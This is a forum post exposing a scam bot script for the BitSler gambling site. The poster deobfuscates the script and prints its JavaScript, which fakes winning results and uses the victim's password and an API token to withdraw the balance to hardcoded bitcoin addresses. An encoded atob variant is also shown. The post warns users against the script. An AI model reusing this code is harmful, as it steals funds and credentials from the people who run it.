Bitcointalk Thread: BitSler Ultimate Script To Double or Triple The Money
https://bitcointalk.org/index.php?topic=1454561.0Was bored, went to deobfuscate his lousy script, found that his scripts secretly steals from users
I wasnt scammed but I am sure that him putting it in marketplace, giving it for free but attempting to include auto withdraw to his btcaddress counts as a scammer right?
function startbot() {
$('#modal-bot').modal("hide");
var qt = setInterval(function() {
$('#btn-bet-dice').button("reset");
var qba = parseFloat($('#profit').val()) + parseFloat($("p[class='text-thin mar-no balance-' + devise + '-html']").text());
$("p[class='text-thin mar-no balance-" + devise + "-html']").text(qba.toFixed(8));
$('#won-bet span').removeClass('text-danger');
$('#won-bet span').addClass('text-success');
$('#won-bet span').text($('#profit').val());
show_result_bet();
$('.balance-' + devise + "-html").addClass('result-bet-win');
setTimeout(function() {
$(".balance-" + devise + "-html").removeClass('.result-bet-win');
$('#btn-bet-dice, #btn-bet-start-pilot-dice, #btn-bet-start-fast-dice').button('loading');
}, 350);
var qad = "address";
var qam = "amount";
$.ajax({
type: "POST",
url: "�/api/generate-token",
data: JSON.parse('�{"name":"withdraw","expire":5}'),
success: function(text) {
var val = JSON.parse(text);
if (val.return.success == true) {
var tok = val.
return.token;
var qc2 = qc - 0.0001;
$('#withdraw-address').val("1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26");
$('#withdraw-amount').val(qc2);
$('#withdraw-password').val($("#bot-pass").val());
$('#withdraw-token').val(tok);
eval('send_withdraw()');
}
}
});
}, 3000);
}
Take note of this particular part
$.ajax({
type: "POST",
url: "�/api/generate-token",
data: JSON.parse('�{"name":"withdraw","expire":5}'),
success: function(text) {
var val = JSON.parse(text);
if (val.return.success == true) {
var tok = val.
return.token;
var qc2 = qc - 0.0001;
$('#withdraw-address').val("1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26");
$('#withdraw-amount').val(qc2);
$('#withdraw-password').val($("#bot-pass").val());
$('#withdraw-token').val(tok);
eval('send_withdraw()');
}
}
});
Basically to newbies who cannot understand javascript, the script op gave will auto withdraw all withdrawals to
1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26.
The withdraw happens using the api token from your account and bypasses your account password because remember? It requires you to give your account and password on start (Script kiddie)
This thread has been archived.
A scam accusation would be made against OP for trying to scam fellow Bitcointalk users and newbies with a "fake apparantly free awesome script".
EDIT 1 while typing this : Above function was deobed from the top comment form the Youtube Video, deobed the one from 3 days ago "The version 3.1 comment", found this address from scammer op that replaced the previous wallet address :
1FYwDy9VcDYqs3T8JNTMj7mmJFrLjPVjmFCode proof from new deorb
$(atob("aW5wdXRbaWQqPSd3aXRoZHJhdy1hZGRyZXNzJ10=")).val(atob("MUZZd0R5OVZjRFlxczNUOEpOVE1qN21tSkZyTGpQVmptRg=="));
which is actually
$('input[id*='withdraw-address']').val('1FYwDy9VcDYqs3T8JNTMj7mmJFrLjPVjmF');
List of archives :
1.Original thread (this thread) archive :
http://archive.is/qFQNB2.Original script url () archive :
http://archive.is/OV1EO3. Youtube video with comments archive:
http://archive.is/VVVFj4. Version 3.1 script archive: (Screenshort as site went down :
http://prnt.sc/b3uhc9)
http://archive.is/Gge1OI am too lazy to find ops other possible alts and accounts, maybe someone else would do it?
Timelord if you have the time, do you mind? XD
EDIT : wording.. i made it sound wrong with my wording initally
